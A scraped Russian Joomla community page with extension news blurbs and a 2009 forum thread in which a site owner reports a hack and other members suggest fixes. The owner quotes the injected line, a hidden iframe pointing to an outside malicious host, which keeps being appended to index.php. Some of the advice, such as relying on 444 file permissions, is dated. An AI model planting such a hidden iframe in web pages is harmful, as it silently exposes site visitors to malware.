Новости Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

👩‍💻 Joomla REST API без прав суперадминистратора. RBAC в Joomla.На канале известного французского разработчика и специалиста по Joomla REST API Alexandre ELISÉ вышло новое видео.RBAC (Role-Based Access Control) - это управление доступом на основе ролей, метод управления доступом к ресурсам, основанный на назначении ролей пользователям. Вместо назначения прав каждому пользователю точечно права доступа группируются по ролям, а пользователи получают доступ к ресурсам уже в зависимости от своей роли. В контексте Joomla и REST API он может даже мешать работе: без авторизованного пользователя вы не можете даже показать контент. В видео показано как решить данную проблему. Создаётся "технический пользователь", которому разрешается просматривать контент, но не разрешено создавать, редактировать, удалять и т.д. И все запросы к REST API идут с использованием его токена. [fr-FR] Services Web API Joomla SANS être Super Admin RBAC natif avec Joomla@joomlafeed #joomla #разработка #rest

InterLinked - плагин автоматической внутренней перелинковки для Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

👩‍💻 InterLinked - плагин автоматической внутренней перелинковки для Joomla.Несвязанные статьи - это молчаливый убийца привлекательности вашего сайта на Joomla, который заставляет читателей сворачивать работу и подрывает эффективность вашего SEO. Content - InterLinked - это бесплатный, проверенный в боях плагин, который кладет конец этой бессмыслице, автоматически генерируя ссылки на основе ключевых слов между статьями на вашем сайте Joomla 5. Он создает сеть связей, используя ключевые слова статей (metakey) и ассоциации категорий, с настраиваемыми всплывающими подсказками, целевыми объектами ссылок и классами CSS, сохраняя при этом существующие ссылки и повышая производительность за счет кэширования. Кроме того, ссылки со временем меняются по мере того, как в новых статьях используются ключевые слова, что делает ваш контент свежим и актуальным.Возможности.- автоматическая перелинковка на основе значения meta-keywords материалов- встроенная поддержка материалов Joomla- пользовательские ассоциации категорий для создания ссылок (например "Блог" к "Учбеникам")- показ всплывающих подсказок к автоматическим ссылкам (опционально)- настраиваемый атрибут target для ссылок.- указание CSS класса для стилизации ссылок- кэширование совпадений ключевых слов и их ассоциаций- учёт существующих тегов <a> во избежание дублирующих ссылок- автоматическое добавление новых ссылок при появлении новых ассоциаций- веб-доступность: ARIA для ссылок с target="_blank".Плагин бесплатный. Заявлена поддержка Joomla 4 и Joomla 5.Joomla Extensions DirectoryСтраница расширенияСкачать@joomlafeed#joomla #расширения #seo

joomLab Gallery - плагин галереи изображений для Joomla

👩‍💻 joomLab Gallery - плагин галереи изображений для Joomla.Плагин joomLab Gallery позволит Вам добавлять в любой материал неограниченное количество галерей, а главное удобно управлять файлами и эффектами в каждой галерее.Плагин использует популярны скрипты Swiper.js и FancyBox. Первый для крутой организации и эффектов галерей, а второй для красивого и функционального показа оригинальных изображений на Вашем сайте.На данный момент плагин имеет 10 макетов вывода - это 10 различных эффектов галерей и Вы можете совмещать все 10 в 1 материале.Плагин позволяет гибко настраивать индивидуально каждую галерею в материале. Вы можете выбрать макет, эффекты и даже можете управлять функциями всплывающего окна изображения.Недостатки.Такой вид реализации не предусматривает выбор изображения на сервере. Т.е. Вы не можете выбрать уже добавленное фото, только загружать заново. Плагин не предоставляет возможности доступа к медиа-менеджеру.Плагин бесплатный. Разработчик - участник нашего сообщества Александр Новиков (@pro-portal).Страница расширения@joomlafeed#joomla #расширения

0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 5429 Просмотров
*

AndreiFX

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Взломали сайт
« : 01.08.2009, 09:19:30 »
Видимо взломали сайт.
Дописывают в index.php след. строчку:
Код
<iframe src="http://x8m.ru:8080/index.php" width=138 height=168 style="visibility: hidden"></iframe>

Сайт соответственно не грузится и выдает ошибку:
Parse error: syntax error, unexpected '<' in /home/host900124/nojuris.ru/htdocs/www/index.php on line 91

Удаляю эту строчку-все начинает нормально работать, но через некоторое время опять строчка дописывается.
Подскажите плиз, как это устранить?
Если к index.php доступ вообще закрыть, поможет?
*

profiX0808

  • Захожу иногда
  • 497
  • 70 / 0
Re: Взломали сайт
« Ответ #1 : 01.08.2009, 10:04:15 »
нужно смотреть в первую очередь на сторонние расширения, возможно в них есть уязвимость...
проверить "комп" на наличие вирусов...
сменить "всевозможные" пароли...
пользоваться поиском на данном форуме (много подобных тем - там есть что почерпнуть ;) )
*

AndreiFX

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Взломали сайт
« Ответ #2 : 03.08.2009, 20:51:14 »
Спасибо за ответ.
скажите, а если я index.php свой залью туда и поставлю на него права доступа 444 ? Сработает?
*

oppo

  • Захожу иногда
  • 365
  • 82 / 8
  • ΨΨΨ я - УКРАЇНЕЦЬ
Re: Взломали сайт
« Ответ #3 : 03.08.2009, 22:01:45 »
Спасибо за ответ.
скажите, а если я index.php свой залью туда и поставлю на него права доступа 444 ? Сработает?
как правило *портяться* не только index.php а файлы шаблона , админки и прч.
тема подымалась не раз - поищите на форуме
права 644
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #4 : 04.08.2009, 06:31:02 »
права 644
с такими правами у скрипта виря есть право на запись, т.к. он выполняется на стороне сервака, так что:

простое решение установить на все файлы index.php(html), default.php и configuration.php - права 444 и все пройдет
+ закрыть доступ к ФТП совсех IP, кроме своего!

(проблема такая была 1,5 года назад, сейчас ее более нету)
*

pedrosoft

  • Захожу иногда
  • 367
  • 113 / 7
Re: Взломали сайт
« Ответ #5 : 04.08.2009, 12:17:19 »
да скорее всего у AndreiFX на компьютере троян, который угнал пароли из фтп-клиента и теперь хулиганит
Интернет Хостинг Центр: отличные цены, лучшее качество, расположение в дата-центре «Оверсан-Меркурий»
*

lsk

  • Захожу иногда
  • 362
  • 13 / 5
Re: Взломали сайт
« Ответ #6 : 04.08.2009, 12:42:20 »
+ закрыть доступ к ФТП совсех IP, кроме своего!
как это сделать?
*

era

  • Администратор
  • 1588
  • 392 / 5
  • В туалете лучше быть пользователем, чем админом.
*

bestel

  • Захожу иногда
  • 62
  • 5 / 1
  • Let the metal flow!...
Re: Взломали сайт
« Ответ #8 : 04.08.2009, 13:04:50 »
да скорее всего у AndreiFX на компьютере троян, который угнал пароли из фтп-клиента и теперь хулиганит
Так и есть. Вывод: больше не хранить пароли ни в одном ftp-клиенте.
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #9 : 04.08.2009, 15:05:40 »
Так и есть. Вывод: больше не хранить пароли ни в одном ftp-клиенте.
если стоит ограничение по IP на допуск к ФТП и права на файлы индекса и дефаулт, а так же конфиг стоят 444, то хранить пароли можно (не рекомендуется, но можно!!!)
как это сделать?
спросить у хостера, а вдруг у него такая услуга есть :)
*

bestel

  • Захожу иногда
  • 62
  • 5 / 1
  • Let the metal flow!...
Re: Взломали сайт
« Ответ #10 : 04.08.2009, 16:31:00 »
если стоит ограничение по IP на допуск к ФТП и права на файлы индекса и дефаулт, а так же конфиг стоят 444, то хранить пароли можно (не рекомендуется, но можно!!!)спросить у хостера, а вдруг у него такая услуга есть :)

Если нормальный хостинг, то там есть cPanel, ниче спрашивать не надо, наше - всьо :)
*

lsk

  • Захожу иногда
  • 362
  • 13 / 5
Re: Взломали сайт
« Ответ #11 : 04.08.2009, 17:04:08 »
Если нормальный хостинг, то там есть cPanel, ниче спрашивать не надо, наше - всьо :)
Удиви, дай инструкцию как в cPanel ограничить доступ к FTP только для 1 IP.
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #12 : 04.08.2009, 17:47:02 »
Удиви, дай инструкцию как в cPanel ограничить доступ к FTP только для 1 IP.
У меня вот так - смотри вложение ::)

[вложение удалено Администратором]
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #13 : 04.08.2009, 17:48:55 »
Если нормальный хостинг, то там есть cPanel, ниче спрашивать не надо, наше - всьо :)
Иногда нужно именно спрашивать, дабы я на 1 хостере видел данную услугу платную 100 руб единоразово :)
*

lsk

  • Захожу иногда
  • 362
  • 13 / 5
Re: Взломали сайт
« Ответ #14 : 04.08.2009, 23:05:49 »
Красиво!
У меня cPanel есть, а возможности такой нет. Хостер подтвердил.
Есть еще какие варианты?
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #15 : 04.08.2009, 23:31:36 »
чем не подходит вариант с правами?
вири пока не умеют менять права (почему то не умеют, писал бы я, объязательно предусмотрел такой вариант ::) )
« Последнее редактирование: 06.08.2009, 13:58:39 от ShadowXak »
*

Valiks

  • Захожу иногда
  • 108
  • 6 / 3
Re: Взломали сайт
« Ответ #16 : 06.11.2009, 03:06:38 »
У меня вопрос по блокировке IP
В моей cPanel  стоит возможность заблокировать определёггые IP, а вот, чтобы дать доступ только определённым IP, такой опции нет. Но, как я понял, если ввести в .htaccess запреты на определённые IP, то они автоматом появляются и в cPanel-и. Следовательно, можно через .htaccess сделать и обратное,- задать права доступа только определённому IP?

Правильно ли я думаю или нет? И, если "да", не подскажет ли кто-то как и что надо написать в .htaccess , учитывая тот факт, что у меня от провайдера динамическое IP, меняющееся в определённом диапазоне. Как ввести диапазон IP? Или, лучше купить себе собственное IP? Но, до того времени, следовало бы заблокировать сторонний доступ по диапазону. А потом думать дальше, что делать. Помогите, подскажите что и как ввести в .htaccess?
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #17 : 06.11.2009, 06:40:38 »
чем не подходит вариант с правами?
вири пока не умеют менять права (почему то не умеют, писал бы я, объязательно предусмотрел такой вариант ::) )
чем не подходит?
по .htaccess задайте вопрос поддержек хостинга.
сейчас ставлю права 444 на файлы описанные выше и все гуд [плююся]!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 2827
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2189
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 1078
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 2191
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 7638
Последний ответ 08.01.2020, 12:52:55
от winstrool